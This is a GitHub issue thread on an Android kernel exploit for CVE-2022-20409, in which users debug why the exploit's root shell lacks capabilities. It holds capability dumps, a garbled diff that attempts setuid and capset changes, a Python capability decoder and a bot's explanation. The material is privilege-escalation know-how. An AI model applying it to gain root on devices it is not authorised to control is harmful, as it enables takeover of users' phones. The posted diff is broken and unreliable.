Markakd / bad_io_uring

Android kernel exploitation for CVE-2022-20409
156 stars 24 forks

ls: .: Permission denied #4

Open stevejubs opened 6 months ago

stevejubs commented 6 months ago

Thank you for the exploit. However, the root shell returns 'Permission denied' on Pixel 6. I need to know the root cause of the problem.

[Screenshot 2567-03-19 at 01 23 14]
ye4ah4 commented 5 months ago

Hi, I encountered the same issue on the Samsung S22 and also failed to find the root cause or a solution.

ye4ah4 commented 5 months ago

Hi,

I used a root shell obtained with Magisk to check the process capabilities:

    r0q:/ # cat /proc/self/status | grep Cap
    CapInh: 0000000000000000
    CapPrm: 000001ffffffffff
    CapEff: 000001ffffffffff
    CapBnd: 000001ffffffffff
    CapAmb: 0000000000000000

But with the root shell obtained using the exploit, the process capabilities are:

    r0q:/data/local/tmp # cat /proc/self/status | grep Cap
    CapInh: 0000000000000000
    CapPrm: 00000000000000c0
    CapEff: 00000000000000c0
    CapBnd: 00000000000000c0
    CapAmb: 0000000000000000

Could this be the reason? Thank you. I am attempting to modify the capabilities of the exploit to be similar to Magisk's capabilities, but I am not very familiar with the code, and I haven't succeeded in making the changes yet.

Best Wishes
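The two `grep Cap` dumps above are easier to reason about once the hex masks are turned into capability names. The following decoder is an added example written for this thread, not code from the bad_io_uring project or from either commenter; it embeds the two outputs quoted above as constructed sample input and assumes the capability bit numbering from the Linux UAPI header (bits 0 to 40). It also reports which capabilities a process could still raise into its effective set from user space (those in CapPrm but not in CapEff), which is the only kind of change capset(2) permits.

```python
"""Decode the Cap* lines of /proc/<pid>/status and compare two root shells.

Added example for the thread above (not part of bad_io_uring). The sample
status dumps are the two outputs quoted in the comment, embedded here so the
script runs offline.
"""
import re

# Capability bit numbers from include/uapi/linux/capability.h (bits 0..40).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]
# All 41 bits set: 0x1ffffffffff, the value a fully privileged root shell shows.
FULL_MASK = (1 << len(CAP_NAMES)) - 1

# Constructed samples: the two `cat /proc/self/status | grep Cap` outputs
# quoted in the comment above (Magisk shell vs. exploit shell).
MAGISK_STATUS = """\
CapInh: 0000000000000000
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000
"""
EXPLOIT_STATUS = """\
CapInh: 0000000000000000
CapPrm: 00000000000000c0
CapEff: 00000000000000c0
CapBnd: 00000000000000c0
CapAmb: 0000000000000000
"""

_CAP_LINE = re.compile(r"^(Cap\w+):\s*([0-9a-fA-F]+)\s*$", re.M)


def parse_cap_lines(status_text):
    """Return {'CapInh': int, 'CapPrm': int, ...} from a /proc/<pid>/status dump."""
    return {name: int(hexval, 16) for name, hexval in _CAP_LINE.findall(status_text)}


def decode(mask):
    """Names of the capability bits set in `mask`, lowest bit first."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def missing_from_full(mask):
    """Capabilities a fully privileged root shell has that `mask` lacks."""
    return decode(FULL_MASK & ~mask)


def raisable(caps):
    """Capabilities capset(2) could still move into the effective set: those in
    CapPrm but not yet in CapEff. Bits outside CapPrm can never be added from
    user space, so attempts to set them fail with EPERM."""
    return decode(caps["CapPrm"] & ~caps["CapEff"])


def summarize(status_text):
    """One-shot report for a status dump: effective caps, how many are missing
    relative to a full set, and what user space could still raise."""
    caps = parse_cap_lines(status_text)
    return {
        "effective": decode(caps["CapEff"]),
        "missing": len(missing_from_full(caps["CapEff"])),
        "raisable": raisable(caps),
    }


if __name__ == "__main__":
    for label, text in (("magisk", MAGISK_STATUS), ("exploit", EXPLOIT_STATUS)):
        print(label, summarize(text))
```

Run against the quoted dumps, the exploit shell decodes to just `cap_setgid` and `cap_setuid` (0xc0 is bits 6 and 7), with 39 capabilities missing and nothing left that user space could raise, because CapPrm and CapBnd are equally narrow; the Magisk shell holds all 41.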

ye4ah4 commented 5 months ago

I tried to modify the cap as follows, but it failed, saying that the permissions were insufficient.

--- a/exp_s22.c +++ b/exp_s22.c @@ -38,6 +38,7 @@

include <sys/socket.h>

+#include <sys/capability.h>

define MAX_PIPE_NUM 0x400

define MAX_256_PIPE 0x400

void exploit(void) { setuid(0); seteuid(0);

when exp cred is overwritten cap strerror(errno) Operation not permitted cap now uid/gid: 0/0
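Review bot: the cap_* change cannot succeed from user space, so the "Operation not permitted" result is expected rather than a bug in how the call is written: the exploit shell's own status dump earlier in this thread shows CapPrm, CapEff and CapBnd all at 00000000000000c0 (CAP_SETGID and CAP_SETUID only), and capset(2) / cap_set_proc(3) can only move capabilities that are already in the permitted set into the effective set, never add bits that are absent from it. The hunk is also unreadable as posted: the `@@ -38,6 +38,7 @@` header promises one added line, yet the `setuid(0); seteuid(0);` body and the "cap now uid/gid: 0/0" output appear without +/- markers, and the leading `#` of the include and define lines was eaten by markdown rendering; wrap the diff in a fenced code block so the full change can be reviewed.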